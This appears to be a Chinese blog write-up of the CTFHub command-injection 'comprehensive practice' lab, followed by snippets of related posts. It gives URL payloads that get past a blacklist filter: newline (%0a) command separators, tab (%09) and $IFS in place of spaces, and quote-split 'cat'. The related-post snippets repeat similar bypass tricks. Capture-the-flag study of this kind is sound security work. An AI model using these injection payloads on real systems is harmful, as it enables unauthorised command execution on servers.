CTFHub 命令注入-综合练习

已于 2023-03-21 23:32:38 修改
阅读量951 收藏 6
点赞数
文章标签: 网络安全
于 2023-03-21 23:05:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56096156/article/details/129699668
版权

CTFHub 命令注入-综合练习

1.分析代码得知过滤了命令连接符号&、|、;因此常用命令连接符不可用,可以使用”%0a
, 并且在输入框并无结果,因此我们在url里输入命令:

?ip=127.0.0.1%0als#

在这里插入图片描述
看到了flag文件。

2.tab键可以自动补齐后面的内容ls%09*可查看所有的文件

?ip=127.0.0.1%0als%09*

在这里插入图片描述

3.接下来查看flag,因为cat被过滤了,我们可以使用单引号的url编码%27将cat的任意字母包裹:

?ip=127.0.0.1%0acd%09*is_here%0ac%27a%27t%09*_18891124428806.php#

然后查看源代码得到hub.

在这里插入图片描述

君谦simg
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFhub RCE 命令注入部分
qq_41497476的博客
07-01 1251
这种题其实已经比较熟悉了,使用 |,&&,;等分隔符对前面ping的内容进行隔断,然后执行自己的命令 任意值;ls 发现了除了目录下除了index.php外还有另一个php文件 输入 127.0.0.0;cat 21701615624125.php 发现确实多了个反馈的参数,但是看不到值,很疑惑后面知道了,这是因为cat命令反馈的值无法直接显示 这时有两个方法,一是直接查看源码 源码里是能看到的 第二个方法是直接把命令改为 127.0.0.1;cat 27712282015742.php.
CTFHub SQL注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-09 1114
ctfhub的SQL注入中的flag是动态生成的 1、整数型注入 1、按照提示输入1 发现直接给出了SQL语句,根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数 首先使用order by 3 ,页面无回显,改为2之后页面显示正确。因此判断当前数据库当前表,共有2个字段。 3、使用联合查询,判断页面显示位 首先将id改为一个不存在的纸,根据联合查询的特性,就会返回11111,222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数
CTFHUB技能树】-命令注入RCE综合练习
zguohuai的博客
03-15 664
CTFHUB攻防世界解决命令综合注入
ctfhub 命令注入
最新发布
a666666688的博客
08-05 407
因为过滤了分割符,所以flag_is_here文件夹下的文件不能直接读取。若要在表单提交处修改则需要注意,提交后删除url中的25后即可执行。如果包含了这些被禁止的字符,就将匹配结果存储在。如果不包含这些字符,就构建一个。参数,会进行进一步的正则表达式匹配检查。这段代码的主要目的是根据用户通过。函数执行,将结果存储在。注意本体在url上修改即可。参数执行相应的操作。
CTFHub_技能树_Web之RCE——“命令注入综合练习
Ho1aAs‘s Blog
07-29 2735
文章目录使用工具解题过程完 –>CTFHub传送门<– 使用工具 Microsoft Edge v84.0.522.40 解题过程 最后一题来了个狠的,cat、flag还有各种符号都被过滤了 分隔符可以使用%0a代替 若直接使用文本框上传命令会导致字符被转义,直接访问URL /?ip=127.0.0.1%0als => 127.0.0.1;ls 查看目录 接下来要访问flag_is_here,需要绕过空格过滤、flag文字过滤并且显示文件夹的内容 (space) => $
ctfhub-->命令注入练习
qq2489021103的博客
04-01 667
ctfhub-web练习–>各种绕过 1.这题没有任何过滤 直接127.0.0.1;ls获取目录,找到flag,然后cat flag在注释里面。 2.这题过滤了cat 百度下php类cat方法: 127.0.0.1;ls 得到目录后 127.0.0.1; less flag_11261594711502.php 得到flag 3.过滤空格 用IFS绕过127.0.0.1;cat{IFS}绕过 127.0.0.1;catIFS绕过127.0.0.1;cat{IFS}flag_163033
CTFHub综合练习详解
YZP16670253193的博客
11-17 781
使用%0als得到一个flag_is_here文件夹和一个index.php文件,很明显index.php并不是我们要的flag而是网页PHP源码,那么flag肯定就在flag_is_here文件夹中,但网页已经过滤了空格和flag。这里我们可以利用url地址栏来构造payload ,在url中%0a代表换行当在ping后面接上%0a便可执行下一条命令(建议使用burp抓包,因为。最后只需要CD去这个文件夹并打开flag文件就行了,在LINUX中打开文件可以用。这样就得到一个装有flag的php文件了。
CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 2291
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
CTFHUB-WEB-RCE【08】命令注入
(∪.∪ )...zzz的博客
06-10 214
????命令注入源代码用IP传入IP&ls 查看文件IP&cat 查看内容过滤cat使用`\` `''` `""` `{任意无意义变量名}`等方法均可绕过过滤空格`$IFS` `$IFS$9` 重定向符`<`过滤目录分隔符; && 执行多条命令过滤运算符;综合过滤练习%0a 命令注入 源代码用IP传入 IP&ls 查看文件 1.1.1.1&ls IP&cat 查看内容 1.1.1.1&cat 7096156205265.php 过
CTFHUB-web-RCE
ookami6497的博客
12-03 1475
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7111
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
ctfhub-远程连接命令/代码执行漏洞
ad12456的博客
05-04 892
CTFHub练习
CTFHUB-RCE通关记录以及常见的绕过过滤的方法
不想当脚本小子的脚本小子
03-21 2187
先过关,再分析相关的防御源代码 1.过滤cat 然后cat 301472130920273.php然后查看网页源代码即可得到flag 2.过滤cat 根据题目要求过滤了cat 而该服务器为Linux系统区分大小写 就无法通过大小写来绕过 本来想使用vi命令替换cat命令也能查看到flag中的内容 但是失败了 最后用了替换法:127.0.0.0 ; $a=ca;$b=t; $a$b flagxxxx 题目源码: <?php $res = FALSE; if (is.
ctfhub_REC_综合练习
devil8123665的博客
12-29 1121
目录 1 打开题目,查看如下源码 2代码分析 3查看当前路径 4查看flag_is_here目录 5获取flag值 6使用的python脚本 1 打开题目,查看如下源码 <?php ​ $res = FALSE; ​ if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/(\||&|;| |\/|cat|...
CTFHub技能树web(持续更新)--RCE--命令注入--综合过滤练习
jiuyongpinyin的博客
01-27 2284
综合过滤练习 这道题试了好多种方法,最后才发现需要在url里面改才可以,也是参考了大佬的链接 我是大佬链接 这道题能过滤的基本都过滤了,我们第一步应该想办法查看当前文件夹的内容,这里常用的管道符都不能用,只能用换行符的url编码 %0a,并且去要在url中修改: ?ip=127.0.0.1%0als# 看到了回显就看到了希望,接下来要进入到flag这个文件夹中来查看该文件夹的内容,这里flag被过滤了,又学到了一个新的知识点TAB的url编码,我们用这个把文件夹的名字补全: ?ip=127.0.0.
CTFHub | 命令注入
尼泊罗河伯的博客
06-14 1843
检查网页显示内容,可以直接看到源代码。大致意思是:检查用户输入的 GET 请求,判断用户是否输入了ip 信息。如果输入了 ip 信息,则使用用户输入的这个 ip 数据执行一个 shell 命令 "ping -c 4" 。
ctfhub-命令注入
m0_62094846的博客
12-15 335
看到有Ping直接写127.0.0.1看看 可以成功,再输入命令 每个都试一次 两个文件都试过了,都没有flag 然后看看上一个文件夹 然后也一个个试了,也没用 后面的都是这样的 看wp,是在48892291724801.php里面 以后看到有点奇怪的要留心一些,可能包含了flag,然后它的回显也不一样,就是有数据出来的样子,但是没有数据,就看看源代码 ...
ctfhub——命令注入
m0_75007575的博客
04-05 376
这段代码首先检查是否存在名为ip的GET参数,并且该参数的值不为空。如果满足条件,将获取GET参数ip的值赋给变量$ip。接着,创建一个空数组$m,然后通过正则表达式preg_match_all("/\//", $ip, $m)来检查$ip中是否包含斜杠/。如果$ip中包含斜杠,则直接将匹配结果存储在数组$res中。既然不能使用目录分隔符,那我们就先进入目录再去查看文件。打开控制台发现代码里面出现了flag,即通过成功。运算符都被过滤掉了,我们也可以使用;回显空白,得到flag。回显空白,得到flag。
CTFHub 命令注入-无过滤
07-25
CTFHub 命令注入-无过滤是一个题目,它的源代码中存在一个命令注入漏洞。在这个题目中,用户可以通过输入IP地址执行ping命令。\[1\]由于没有采用过滤,用户可以直接进行命令拼接,例如输入"192.168.43.222;ls"可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值